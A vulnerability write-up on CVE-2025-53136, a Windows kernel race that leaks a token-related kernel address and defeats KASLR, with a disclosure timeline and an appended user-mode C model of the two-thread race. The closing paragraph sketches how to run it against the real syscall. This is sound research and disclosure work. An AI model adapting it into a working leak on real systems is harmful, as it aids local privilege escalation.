NT OS Kernel Information Disclosure Vulnerability – CVE-2025-53136
Date: September 11, 2025
Authors: hieu.q, voidsec
Source: Crowdfense - Vulnerability Research Hub

---

Introduction

Starting with Windows 11 24H2 (and the matching Windows Server release), Microsoft restricted kernel base address disclosure through system calls such as NtQuerySystemInformation() with the SystemModuleInformation class: unless the caller holds SeDebugPrivilege, module base addresses are no longer returned. This closed the most common Kernel Address Space Layout Randomization (KASLR) bypasses that exploits relied on to locate kernel objects.

While analysing the patch for CVE-2024-43511, the researchers found a new kernel information leak introduced by that patch itself. The bug is a race condition that exposes a kernel address tied to a token, which gives an exploit chain on current Windows builds the KASLR bypass it needs for privilege escalation.

---

Vulnerability Details

Quick Review of the CVE-2024-43511 Patch

In October 2024 Microsoft fixed a TOCTOU (time-of-check to time-of-use) race condition in the Windows kernel, tracked as CVE-2024-43511. The fix changed the call to RtlSidHashInitialize(): the function now receives a pointer read from the kernel-side TOKEN structure instead of a pointer taken from user-controlled input.

Bug Description

The first parameter of RtlSidHashInitialize() is now a kernel pointer into the TOKEN structure (the token's UserAndGroups array). The function stores that pointer into the SID hash structure passed as its third parameter, and in this code path that structure lives in a user-controlled output buffer. The caller later overwrites the stored value, but for a short window the kernel pointer is visible in user memory, and a second thread that reads the buffer during that window obtains it.

The bug is reached by calling NtQuerySystemInformation() with the SystemTokenInformation class.

Effects

The leak is particularly valuable on Windows 24H2 and later, where the traditional kernel address leaks are blocked. Because the bug lives in an NT system call, it can be triggered from Low integrity level (Low IL) processes and from AppContainer sandboxes.
When combined with a write-what-where primitive (for example, one that overwrites the Privileges field of a TOKEN object), the leaked address supports full local privilege escalation.

---

Exploitation

Setup

The exploit runs two threads concurrently:

- One thread repeatedly reads the user buffer at the offset where the leaked pointer is stored, keeping any value that looks like a kernel address.
- The other thread calls NtQuerySystemInformation() in a loop to trigger the race and have the kernel write the pointer into the buffer.

Reliability

The race window is wide enough for the reader thread to catch the kernel address reliably. With the syscall invoked continuously and the buffer read concurrently, the exploit obtains the leaked address nearly every time.

Proof-of-Concept

The bug was demonstrated on a Windows Insider Preview build from April 2025. The proof of concept works from both Low IL and AppContainer contexts; the published screenshots show successful kernel address leaks under both.

---

Conclusion

Patch analysis remains a productive way to find new vulnerabilities, and it also shows how a fix can introduce a bug of its own. A change to a security-critical function must account for every caller of that function: here, switching RtlSidHashInitialize() to a kernel-side pointer was the right fix for the TOCTOU bug, but the function also writes its first parameter into the caller-supplied hash structure, and in one code path that structure is a user-controlled buffer. Understanding how a function is used before altering it is essential to avoid trading one vulnerability for another.

---

Disclosure Timeline

- April 8, 2025: Vulnerability reported to Microsoft.
- April 9, 2025: Microsoft acknowledges the report and opens an investigation.
- April 22, 2025: Microsoft closes the case as a duplicate; the researcher raises the issue publicly on X (Twitter).
- April 25, 2025: Microsoft confirms the bug is valid.
- April 29, 2025: Microsoft confirms the bug is in scope.
- August 1, 2025: CVE-2025-53136 officially assigned.

---

Additional Information

The vulnerability leverages a race condition in kernel token data handling
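The two-thread setup from the Exploitation section, modelled in portable C as an added example (this is not the Crowdfense proof of concept and it does not call the Windows kernel): a stand-in for the patched RtlSidHashInitialize() stores a constructed kernel address into the hash header it is handed, fills the table, and only then does the modelled syscall path replace the pointer, exactly the store-then-fixup ordering the Bug Description relies on. The user side runs the syscall loop and the reader thread described above and counts how many calls it took to win. The struct layout, the KERNEL_USER_AND_GROUPS value, the 200-group token and the bucket count are assumptions of the model; the one Windows-specific fact used is the x64 user/kernel split at 0xFFFF800000000000, which is what the reader uses to recognise a kernel pointer.

```c
/*
 * User-mode model of the CVE-2025-53136 race window. Added example; it does
 * not call the Windows kernel and is not the Crowdfense proof of concept.
 * The "kernel" half mimics the patched RtlSidHashInitialize(): its first
 * argument is a kernel-side pointer, which it stores into the hash header it
 * is handed before building the table. The "user" half runs the two-thread
 * race from the write-up. Layouts and addresses are constructed for the model.
 */
#include <pthread.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define SID_HASH_SIZE 32        /* bucket count, assumed for the model */
#define MODEL_SID_COUNT 200     /* groups in the modelled token, assumed */

/* Constructed stand-in for the kernel address of TOKEN->UserAndGroups. */
#define KERNEL_USER_AND_GROUPS 0xFFFFA58B12345640ULL

/* Model of the hash header: sid_attr is the field the reader thread polls. */
struct sid_hash {
    uint32_t sid_count;
    _Atomic(uint64_t) sid_attr;             /* receives the kernel pointer first */
    volatile uint64_t hash[SID_HASH_SIZE];  /* filled while the pointer is exposed */
};

/* x64 Windows splits the canonical address space at bit 47: user-mode addresses
 * stay below 0x00007FFFFFFFFFFF and kernel addresses start at
 * 0xFFFF800000000000, so a high-half value in a user buffer is a kernel leak. */
bool looks_like_kernel_pointer(uint64_t p)
{
    return p >= 0xFFFF800000000000ULL;
}

/* Model of RtlSidHashInitialize(): stores the pointer it was given, then builds
 * the table. The per-SID mixing stands in for the real hashing work and is the
 * window during which the reader can grab the pointer. */
static void model_rtl_sid_hash_initialize(uint64_t sid_attr, uint32_t sid_count,
                                          struct sid_hash *hash)
{
    hash->sid_count = sid_count;
    atomic_store_explicit(&hash->sid_attr, sid_attr, memory_order_relaxed);
    for (uint32_t i = 0; i < SID_HASH_SIZE; i++)
        hash->hash[i] = 0;
    for (uint32_t i = 0; i < sid_count; i++) {
        /* volatile read seeds the mix so the compiler cannot fold the loop */
        uint64_t h = hash->hash[i % SID_HASH_SIZE] ^ (0x9E3779B97F4A7C15ULL * (i + 1));
        for (int r = 0; r < 64; r++) {
            h ^= h << 13;
            h ^= h >> 7;
            h ^= h << 17;
        }
        hash->hash[i % SID_HASH_SIZE] |= h;
    }
}

/* Model of the SystemTokenInformation path: the hash is initialised directly in
 * the caller's buffer and only afterwards is sid_attr replaced ("later replaced"
 * in the write-up). The replacement value is constructed by the caller. */
static void model_nt_query_system_token_information(struct sid_hash *user_buf,
                                                    uint64_t replacement)
{
    model_rtl_sid_hash_initialize(KERNEL_USER_AND_GROUPS, MODEL_SID_COUNT, user_buf);
    atomic_store_explicit(&user_buf->sid_attr, replacement, memory_order_relaxed);
}

struct race_state {
    struct sid_hash buf;        /* the user-supplied output buffer */
    _Atomic(uint64_t) leaked;   /* kernel pointer once captured, else 0 */
    _Atomic(bool) stop;
    uint64_t attempts;          /* syscalls issued before the leak was seen */
};

/* Thread 1: spin on sid_attr and keep the first kernel-looking value. */
static void *reader_thread(void *arg)
{
    struct race_state *st = arg;
    while (!atomic_load(&st->stop)) {
        uint64_t v = atomic_load_explicit(&st->buf.sid_attr, memory_order_relaxed);
        if (looks_like_kernel_pointer(v)) {
            atomic_store(&st->leaked, v);
            atomic_store(&st->stop, true);
        }
    }
    return NULL;
}

/* Thread 2 (the caller): hammer the modelled syscall until the reader wins or
 * max_calls is reached. Returns the leaked pointer, or 0 on failure. */
uint64_t race_for_token_pointer(struct race_state *st, uint64_t max_calls)
{
    pthread_t reader;
    atomic_store(&st->leaked, 0);
    atomic_store(&st->stop, false);
    atomic_store(&st->buf.sid_attr, 0);
    st->attempts = 0;
    if (pthread_create(&reader, NULL, reader_thread, st) != 0)
        return 0;
    /* Constructed user-mode replacement: an address inside our own buffer. */
    uint64_t replacement = (uint64_t)(uintptr_t)&st->buf;
    while (!atomic_load(&st->stop) && st->attempts < max_calls) {
        model_nt_query_system_token_information(&st->buf, replacement);
        st->attempts++;
    }
    atomic_store(&st->stop, true);
    pthread_join(reader, NULL);
    return atomic_load(&st->leaked);
}

int main(void)
{
    struct race_state st;
    uint64_t p = race_for_token_pointer(&st, 500000);
    if (p)
        printf("leaked 0x%016llx after %llu call(s)\n",
               (unsigned long long)p, (unsigned long long)st.attempts);
    else
        printf("no leak within %llu calls\n", (unsigned long long)st.attempts);
    return p ? 0 : 1;
}
```

On a real target the reader polls the pointer field of the hash structure inside the buffer passed to NtQuerySystemInformation(SystemTokenInformation, ...) while the second thread keeps issuing the syscall; the same high-half filter separates the transient kernel pointer from the replacement value, and the attempts counter is the reliability figure the write-up reports. The model's window is wide because the table fill sits between the store and the fixup, which mirrors why the real race is winnable rather than a one-instruction gap.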